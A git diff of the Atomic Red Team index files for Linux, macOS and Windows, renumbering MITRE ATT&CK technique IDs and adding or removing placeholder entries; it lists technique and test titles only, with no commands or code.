- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -387,7 +408,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -396,7 +417,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -437,23 +458,26 @@
# execution
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -487,6 +511,7 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 6e1fd445..9b86df85 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -32,9 +32,7 @@
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
@@ -53,13 +51,13 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
+- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
@@ -96,18 +94,19 @@
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.004 SSH Authorized Keys [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -117,18 +116,19 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
-- [T1551.003 Clear Command History](../../T1551.003/T1551.003.md)
+- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
-- [T1551.002 Clear Linux or Mac System Logs](../../T1551.002/T1551.002.md)
+- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.004 Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
@@ -138,9 +138,10 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -149,6 +150,7 @@
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -161,8 +163,9 @@
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1551 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -180,16 +183,17 @@
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.003 Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
@@ -208,14 +212,13 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -290,6 +293,7 @@
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
@@ -300,37 +304,44 @@
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
-- [T1059.004 Bash](../../T1059.004/T1059.004.md)
- - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- - Atomic Test #2: Command-Line Interface [macos, linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.001 Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
+ - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
+ - Atomic Test #2: Command-Line Interface [macos, linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -365,7 +376,7 @@
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -374,7 +385,7 @@
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1545 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -450,12 +461,14 @@
- Atomic Test #1: Keychain [macos]
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 2958ec49..8deb5326 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -26,6 +26,7 @@
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
@@ -137,7 +138,8 @@
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
-- [T1551.001 Clear Windows Event Logs](../../T1551.001/T1551.001.md)
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLogId [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -185,11 +187,12 @@
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.004 File Deletion](../../T1551.004/T1551.004.md)
+- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
@@ -198,6 +201,7 @@
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
@@ -208,7 +212,7 @@
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551 Indicator Removal on Host](../../T1551/T1551.md)
+- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
@@ -252,7 +256,7 @@
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
-- [T1551.005 Network Share Connection Removal](../../T1551.005/T1551.005.md)
+- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
@@ -275,6 +279,7 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -307,6 +312,7 @@
- Atomic Test #1: DCShadow - Mimikatz [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -338,12 +344,13 @@
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1551.006 Timestomp](../../T1551.006/T1551.006.md)
+- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- T1134.001 Token Impersonation/Theft [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -387,6 +394,7 @@
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -435,6 +443,7 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.010 Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
@@ -468,6 +477,7 @@
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -599,6 +609,7 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
+- T1497.001 System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
@@ -620,11 +631,15 @@
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
